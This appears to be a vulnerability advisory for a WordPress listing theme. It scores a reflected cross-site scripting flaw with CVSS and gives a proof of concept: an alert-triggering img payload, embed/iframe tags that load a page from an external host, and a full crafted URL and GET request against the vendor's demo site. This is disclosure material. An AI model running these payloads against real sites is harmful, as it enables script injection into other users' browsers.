6.1 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
4.3 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:M/Au:N/C:N/I:P/A:N
The theme did not properly sanitise and escape its listing_list_view, bt_bb_listing_field_my_lat, bt_bb_listing_field_my_lng, bt_bb_listing_field_distance_value, bt_bb_listing_field_my_lat_default, bt_bb_listing_field_keyword, bt_bb_listing_field_location_autocomplete, bt_bb_listing_field_price_range_from and bt_bb_listing_field_price_range_to parameter in ints listing page, leading to reflected Cross-Site Scripting issues.
### -- [ Payloads: ]
[$] 13"-->">'` -- `<!--<img src="--><img src=x onerror=(alert)(`m0ze`);>
[$] <!--><embed src=https://m0ze.ru/payload/xfsii.html><iframe src=https://m0ze.ru/payload/xfsii.html></iframe>
### -- [ PoC | Unauthenticated Reflected XSS & XFS | Listing search query: ]
[!] https://bello.bold-themes.com/main-demo/listing/?listing_list_view=standard13%22--%3E%22%3E%27`%20--%20`%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`listing_list_view`);%3E&bt_bb_listing_field_my_lat=13%22--%3E%22%3E%27`%20--%20`%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`bt_bb_listing_field_my_lat`);%3E&bt_bb_listing_field_my_lng=13%22--%3E%22%3E%27`%20--%20`%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`bt_bb_listing_field_my_lng`);%3E&bt_bb_listing_field_distance_value=13%22--%3E%22%3E%27`%20--%20`%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`bt_bb_listing_field_distance_value`);%3E&bt_bb_listing_field_my_lat_default=13&bt_bb_listing_field_my_lng_default=13&bt_bb_listing_field_keyword=13%22--%3E%22%3E%27`%20--%20`%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`bt_bb_listing_field_keyword`);%3E&bt_bb_listing_field_location_autocomplete=13%22--%3E%22%3E%27`%20--%20`%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`bt_bb_listing_field_location_autocomplete`);%3E&bt_bb_listing_field_category=all&bt_bb_listing_field_price_range_from=13%22--%3E%22%3E%27`%20--%20`%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`bt_bb_listing_field_price_range_from`);%3E&bt_bb_listing_field_price_range_to=13%22--%3E%22%3E%27`%20--%20`%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`bt_bb_listing_field_price_range_to`);%3E
[!] GET /main-demo/listing/?listing_list_view=standard13%22--%3E%22%3E%27`%20--%20`%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`listing_list_view`);%3E&bt_bb_listing_field_my_lat=13%22--%3E%22%3E%27`%20--%20`%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`bt_bb_listing_field_my_lat`);%3E&bt_bb_listing_field_my_lng=13%22--%3E%22%3E%27`%20--%20`%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`bt_bb_listing_field_my_lng`);%3E&bt_bb_listing_field_distance_value=13%22--%3E%22%3E%27`%20--%20`%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`bt_bb_listing_field_distance_value`);%3E&bt_bb_listing_field_my_lat_default=13&bt_bb_listing_field_my_lng_default=13&bt_bb_listing_field_keyword=13%22--%3E%22%3E%27`%20--%20`%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`bt_bb_listing_field_keyword`);%3E&bt_bb_listing_field_location_autocomplete=13%22--%3E%22%3E%27`%20--%20`%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`bt_bb_listing_field_location_autocomplete`);%3E&bt_bb_listing_field_category=all&bt_bb_listing_field_price_range_from=13%22--%3E%22%3E%27`%20--%20`%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`bt_bb_listing_field_price_range_from`);%3E&bt_bb_listing_field_price_range_to=13%22--%3E%22%3E%27`%20--%20`%3C!--%3Cimg%20src=%22--%3E%3Cimg%20src=x%20onerror=(alert)(`bt_bb_listing_field_price_range_to`);%3E HTTP/1.1
Host: bello.bold-themes.com
6.1 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
4.3 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:M/Au:N/C:N/I:P/A:N